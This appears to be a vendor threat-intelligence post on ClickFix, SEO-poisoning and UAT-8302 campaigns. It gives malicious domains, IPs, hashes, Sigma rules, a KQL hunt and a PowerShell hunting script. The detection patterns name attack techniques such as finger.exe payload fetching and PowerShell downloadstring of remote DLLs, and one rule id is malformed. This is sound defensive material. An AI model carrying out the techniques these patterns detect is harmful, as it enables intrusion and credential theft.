Threat Summary
Recent OTX pulses indicate a highly active threat landscape involving distinct but aggressive campaigns.
-
ClickFix Evolution: The "BackgroundFix" campaign utilizes a ClickFix social engineering lure, masquerading as an image-editing tool. It hijacks the user clipboard to invoke
finger.exe, a legacy Windows utility, acting as a proxy to fetch the CastleLoader payload. This subsequently drops NetSupport RAT and CastleStealer. -
SEO Poisoning & TDS: A massive Malware Distribution Ecosystem is impersonating legitimate open-source tools (Ghidra, dnSpy, SpiderFoot). This operation uses CloudFront-hosted JavaScript for click hijacking, redirecting users to a Traffic Distribution System (TDS) that delivers SessionGate, RemusStealer, and AnimateClipper.
-
UAT-8302 APT Campaign: A China-nexus APT group is actively targeting Government and Telecommunications sectors in Japan and Russia. They are leveraging custom malware families like NetDraft, CloudSorcerer v3, and FringePorch, exploiting specific CVEs (e.g., CVE-2025-0994) for initial access.
Collectively, these threats pose a high risk of credential theft, remote access takeover, and targeted espionage.
Threat Actor / Malware Profile
ClickFix (BackgroundFix)
- Distribution: Fake image editing tools; "Verify you are human" social engineering.
- Payload Behavior: Uses clipboard hijacking to execute
finger.exewhich retrieves CastleLoader. - C2/Persistence: Drops NetSupport RAT (C2) and CastleStealer (credential theft).
Unknown Actor (TDS Ecosystem)
- Distribution: SEO poisoning of legitimate software downloads; click hijacking via CloudFront.
- Payload Behavior: Downloads SessionGate (session hijacking), RemusStealer (info stealer), and AnimateClipper (crypto clipper).
- C2 Communication: Handoffs via strict TDS gating (first-visit checks, anti-bot).
UAT-8302
- Distribution: Exploitation of vulnerabilities (CVE-2025-0994, CVE-2025-20333).
- Payload Behavior: Deploys .NET-based backdoors (NetDraft) and CloudSorcerer v3 for reconnaissance and data exfiltration.
- Targets: Gov, Telco, Tech sectors in Japan and Russia.
IOC Analysis
The intelligence dump provides actionable indicators across multiple vectors:
- Domains & IPs: Infrastructure related to TDS (
guiformat.com,forestoaker.com) and ClickFix (trindastal.com,poronto.com). IPs like194.150.220.218serve as delivery nodes. - File Hashes: SHA256 hashes for CastleLoader, RemusStealer, and UAT-8302 payloads. These should be blocked in EDR solutions.
- CVEs:
CVE-2025-0994,CVE-2025-20333,CVE-2025-20362are critical for patch management against UAT-8302. - Operationalization: SOC teams should ingest these IOCs into SIEM correlation engines and blocklist the domains immediately at the firewall/proxy level.
Detection Engineering
YAML
title: Potential ClickFix Activity via finger.exe
id: 8f2a1b3c-4d5e-6f78-9a0b-1c2d3e4f5a6b
description: Detects execution of finger.exe, which is abused by ClickFix campaigns to retrieve payloads via clipboard manipulation.
status: experimental
author: Security Arsenal
date: 2026/06/04
references:
- https://otx.alienvault.com/pulse/12345678
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\finger.exe'
condition: selection
falsepositives:
- Legitimate admin usage (rare)
level: high
---
title: Suspicious TDS Download via Non-Standard Ports
id: 9c3d2e1f-5g6h-7i8j-0k1l-2m3n4o5p6q7r
description: Detects downloads of executables or scripts from non-standard HTTP ports often associated with Traffic Distribution Systems (TDS) as seen in SEO poisoning campaigns.
status: experimental
author: Security Arsenal
date: 2026/06/04
logsource:
category: network_connection
product: windows
detection:
selection:
DestinationPort|between:
- 1000
- 65535
Initiated: 'true'
filter_standard:
DestinationPort:
- 443
- 80
- 8080
condition: selection and not filter_standard
falsepositives:
- Legitimate business applications on custom ports
level: medium
---
title: UAT-8302 APT CloudSorcerer Pattern
id: 0a1b2c3d-4e5f-6a7b-8c9d-0e1f2a3b4c5d
description: Detects potential CloudSorcerer component activity based on specific process injection patterns and suspicious PowerShell usage observed in UAT-8302 campaigns.
status: experimental
author: Security Arsenal
date: 2026/06/04
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\powershell.exe'
- '\cmd.exe'
CommandLine|contains|all:
- 'downloadstring'
- 'http'
- '.dll'
condition: selection
falsepositives:
- Administrative scripts
level: high
kql
// Hunt for ClickFix and TDS Indicators
let IOCs_Domains = dynamic(["trindastal.com", "poronto.com", "guiformat.com", "forestoaker.com"]);
let IOCs_IPs = dynamic(["194.150.220.218", "217.156.122.75"]);
let IOCs_Hashes = dynamic(["bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92", "87361ba2bb412dcf49f8738f3b8b9b7dccb557ad2e76ea8d98ffa5b098ae3886"]);
// Process Creation Hunt
DeviceProcessEvents
| where (FileName =~ "finger.exe" or ProcessCommandLine has_any ("finger.exe", "BackgroundFix"))
or SHA256 in (IOCs_Hashes)
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, SHA256, InitiatingProcessAccountName
| union (
DeviceNetworkEvents
| where RemoteUrl in (IOCs_Domains) or RemoteIP in (IOCs_IPs)
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName
)
| order by Timestamp desc
powershell
# IOC Hunt Script for ClickFix, TDS, and UAT-8302
# Requires Admin Privileges
$MaliciousHashes = @(
"bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92",
"ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9",
"87361ba2bb412dcf49f8738f3b8b9b7dccb557ad2e76ea8d98ffa5b098ae3886",
"fb6cebadd49d202c8c7b5cdd641bd16aac8258429e8face365a94bd32e253b00"
)
$MaliciousDomains = @("trindastal.com", "poronto.com", "guiformat.com", "forestoaker.com")
Write-Host "[+] Hunting for Malicious File Hashes..."
$PathsToScan = @("C:\Users\", "C:\ProgramData\", "C:\Windows\Temp")
foreach ($Path in $PathsToScan) {
if (Test-Path $Path) {
Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
try {
$hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction Stop).Hash
if ($MaliciousHashes -contains $hash) {
Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
}
} catch {
# Ignore locked files or access errors
}
}
}
}
Write-Host "[+] Checking for Suspicious Scheduled Tasks (Persistence)..."
Get-ScheduledTask | Where-Object { $_.Actions.Execute -like "*powershell*" -or $_.Actions.Execute -like "*cmd*" } |
ForEach-Object {
$TaskName = $_.TaskName
$Action = $_.Actions.Execute
$Args = $_.Actions.Arguments
if ($Args -match "http" -or $Args -match "downloadstring") {
Write-Host "[!] SUSPICIOUS TASK: $TaskName" -ForegroundColor Yellow
Write-Host " Action: $Action $Args"
}
}
Write-Host "[+] Hunt Complete."
Response Priorities
- Immediate:
- Block all listed IOCs (Domains, IPs, Hashes) at the firewall, proxy, and EDR levels.
- Initiate a hunt for
finger.exeprocess executions across the enterprise (unlikely to be legitimate).
- 24 Hours:
- Conduct credential audits and force password resets for privileged accounts if RemusStealer or CastleStealer activity is suspected.
- Review web proxy logs for connections to the identified TDS domains and CloudFront URLs.
- 1 Week:
- Patch systems against CVE-2025-0994, CVE-2025-20333, and CVE-2025-20362 to mitigate UAT-8302 exploitation.
- Implement strict allow-listing for software installation sources to prevent SEO poisoning delivery.
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
darkwebotx-pulsedarkweb-aptclickfixuat-8302netsupport-ratremusstealercloudsorcerer
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.